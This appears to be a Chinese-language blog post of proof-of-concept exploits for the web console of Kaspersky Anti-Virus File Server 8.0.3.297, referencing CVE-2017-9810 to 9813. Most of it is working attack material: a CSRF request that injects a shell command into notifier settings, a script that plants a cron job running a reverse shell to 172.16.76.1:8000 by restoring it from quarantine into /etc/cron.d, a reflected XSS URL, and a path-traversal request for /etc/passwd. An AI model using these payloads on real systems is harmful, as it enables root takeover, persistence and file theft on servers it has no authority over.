AD

KasperskyAV_XSS&CSRF&RCE

漏洞简介


卡巴斯基的反病毒文件服务器存在一个WEB控制台,用于监控服务状态及进行一些配置操作。研究人员在版本为8.0.3.297的文件服务器上进行了多种测试。发现存在如下漏洞:

POC


1CSRF:
Payload:
/-----
"notifier": {"Actions": [{"Command": "touch /tmp/pepperoni",
"EventName": 22, "Enable": true, "__VersionInfo": "1 0"}]
-----/

POST /cgi-bin/cgictl?action=setTaskSettings HTTP/1.1
Host: 127.0.0.1:9080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0)
Gecko/20100101 Firefox/52.0
Accept: application/json, text/javascript, */*
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Referer: http://127.0.0.1:9080/
Content-Length: 3273
Cookie: wmc_useWZRDods=true; wmc_sid=690DE0005C5625A420255EFEBB3349F7;
wmc_full_stat=1;
wmc_logsSimpleMode=1;
wmc_backupSimpleMode=1; wmc_quaSimpleMode=1;
wmc_iconsole_lang=resource_en.js;
wmc_show_settings_descr=false;
iconsole_test; wmc_show_licence_descr=false
Connection: close

taskId=7&settings=%7B%22ctime%22%3A%201490796963%2C%20%22notifier%22%3A%20%7B%22Actions%22%3A%20%5B%7B%22Command%22%3A%20%22touch%20%2Ftmp%2Fpepperoni%22%2C%20%22EventName%22%3A%2022%2C%20%22Enable%22%3A%20true%2C%20%22__VersionInfo%22%3A%20%221%200%22%7D%5D%2C%20%22CommonSmtpSettings%22%3A%20%7B%22DefaultRecipients%22%3A%20%5B%5D%2C%20%22InternalMailerSettings%22%3A%20%7B%22ConnectionTimeout%22%3A%2010%2C%20%22SmtpPort%22%3A%2025%2C%20%22SmtpQueueFolder%22%3A%20%22%2Fvar%2Fopt%2Fkaspersky%2Fkav4fs%2Fdb%2Fnotifier%22%2C%20%22SmtpServer%22%3A%20%22%22%2C%20%22__VersionInfo%22%3A%20%221%200%22%7D%2C%20%22Mailer%22%3A%20%221%22%2C%20%22Sender%22%3A%20%22%22%2C%20%22SendmailPath%22%3A%20%22%2Fusr%2Fsbin%2Fsendmail%20-t%20-i%22%2C%20%22__VersionInfo%22%3A%20%221%200%22%7D%2C%20%22EnableActions%22%3A%20true%2C%20%22EnableSmtp%22%3A%20false%2C%20%22SmtpNotifies%22%3A%20%5B%7B%22Body%22%3A%20%22%22%2C%20%22Enable%22%3A%20true%2C%20%22EventName%22%3A%201%2C%20%22Recipients%22%3A%20%5B%5D%2C%20%22Subject%22%3A%20%22Anti-Virus%20started%22%2C%20%22UseRecipientList%22%3A%202%2C%20%22__VersionInfo%22%3A%20%221%200%22%7D%2C%20%7B%22Body%22%3A%20%22%22%2C%20%22Enable%22%3A%20true%2C%20%22EventName%22%3A%206%2C%20%22Recipients%22%3A%20%5B%5D%2C%20%22Subject%22%3A%20%22License%20error%22%2C%20%22UseRecipientList%22%3A%202%2C%20%22__VersionInfo%22%3A%20%221%200%22%7D%2C%20%7B%22Body%22%3A%20%22%22%2C%20%22Enable%22%3A%20true%2C%20%22EventName%22%3A%207%2C%20%22Recipients%22%3A%20%5B%5D%2C%20%22Subject%22%3A%20%22Databases%20updated%22%2C%20%22UseRecipientList%22%3A%202%2C%20%22__VersionInfo%22%3A%20%221%200%22%7D%5D%2C%20%22__VersionInfo%22%3A%20%221%200%22%7D%2C%20%22snmp%22%3A%20%7B%22MasterAgentXAddress%22%3A%20%22tcp%3Alocalhost%3A705%22%2C%20%22PingInterval%22%3A%2015%2C%20%22TrapSuite%22%3A%20%7B%22AVBasesAppliedEventEnable%22%3A%20true%2C%20%22AVBasesAreOutOfDateEventEnable%22%3A%20true%2C%20%22AVBasesAreTotallyOutOfDateEventEnable%22%3A%20true%2C%20%22AVBasesAttachedEventEnable%22%3A%20true%2C%20%22AVBasesIntegrityCheckFailedEventEnable%22%3A%20true%2C%20%22AVBasesRollbackCompletedEventEnable%22%3A%20true%2C%20%22AVBasesRollbackErrorEventEnable%22%3A%20true%2C%20%22ApplicationSettingsChangedEventEnable%22%3A%20true%2C%20%22ApplicationStartedEventEnable%22%3A%20true%2C%20%22LicenseErrorEventEnable%22%3A%20true%2C%20%22LicenseExpiredEventEnable%22%3A%20true%2C%20%22LicenseExpiresSoonEventEnable%22%3A%20true%2C%20%22LicenseInstalledEventEnable%22%3A%20true%2C%20%22LicenseNotInstalledEventEnable%22%3A%20true%2C%20%22LicenseNotRevokedEventEnable%22%3A%20true%2C%20%22LicenseRevokedEventEnable%22%3A%20true%2C%20%22ModuleNotDownloadedEventEnable%22%3A%20true%2C%20%22NothingToUpdateEventEnable%22%3A%20true%2C%20%22ObjectDeletedEventEnable%22%3A%20true%2C%20%22ObjectDisinfectedEventEnable%22%3A%20true%2C%20%22ObjectSavedToBackupEventEnable%22%3A%20true%2C%20%22ObjectSavedToQuarantineEventEnable%22%3A%20true%2C%20%22RetranslationErrorEventEnable%22%3A%20true%2C%20%22TaskStateChangedEventEnable%22%3A%20true%2C%20%22ThreatDetectedEventEnable%22%3A%20true%2C%20%22UpdateErrorEventEnable%22%3A%20true%2C%20%22__VersionInfo%22%3A%20%221%200%22%7D%2C%20%22TrapsEnable%22%3A%20true%2C%20%22__VersionInfo%22%3A%20%221%200%22%7D%7D
&schedule=%7B%7D&skipCtimeCheck=true

2、权限绕过导致命令执行。
# 确定应用已经正常启动及运行
/opt/kaspersky/kav4fs/bin/kav4fs-control --start-app

# /tmp目录下创建job
echo "* * * * * root /tmp/reverse.sh" > /tmp/badcron

# 设置反弹
cat > /tmp/reverse.sh << EOF
#!/bin/bash
bash -i >& /dev/tcp/172.16.76.1/8000 0>&1
EOF
chmod +x /tmp/reverse.sh

# 移动cron job到隔离区域,并获取到到object ID
QUARANTINE_ID=$(/opt/kaspersky/kav4fs/bin/kav4fs-control –Q --add-object /tmp/badcron | cut -d'=' -f2 | cut -d'.' -f1)

# 将文件保存到 /etc/cron.d
/opt/kaspersky/kav4fs/bin/kav4fs-control -Q --restore $QUARANTINE_ID --file /etc/cron.d/implant

3CSRF反射型跨站
http://127.0.0.1:9080/cgi-bin/cgictl?action=licenseKeyInfo&do_action=licenseKeyInfo&scriptName=
&active=&licenseKey=bla

4、本地文件包含
GET /cgi-bin/cgictl?action=getReportStatus&reportId=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
HTTP/1.1
Host: 127.0.0.1:9080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0)
Gecko/20100101 Firefox/52.0
Accept: application/json, text/javascript, */*
Accept-Language: en-US,en;q=0.5
Referer: http://127.0.0.1:9080/
Cookie: iconsole_test; wmc_useWZRDods=true;
wmc_sid=99E61AFCD3EC96F5E349AB439DAE46C4; wmc_full_stat=1;
wmc_logsSimpleMode=1; wmc_backupSimpleMode=0; wmc_quaSimpleMode=1;
wmc_iconsole_lang=resource_en.js
Connection: close

REF


CVE-2017-9810, CVE-2017-9811, CVE-2017-9812, CVE-2017-9813
[1] https://www.kaspersky.com

[2] https://support.kaspersky.com/linux_file80

评论

此博客中的热门博文

简单粗暴导出小米便签

我——终于一个人了

Ubiquiti_Networks_UniFi_Cloud_Key_authed_rce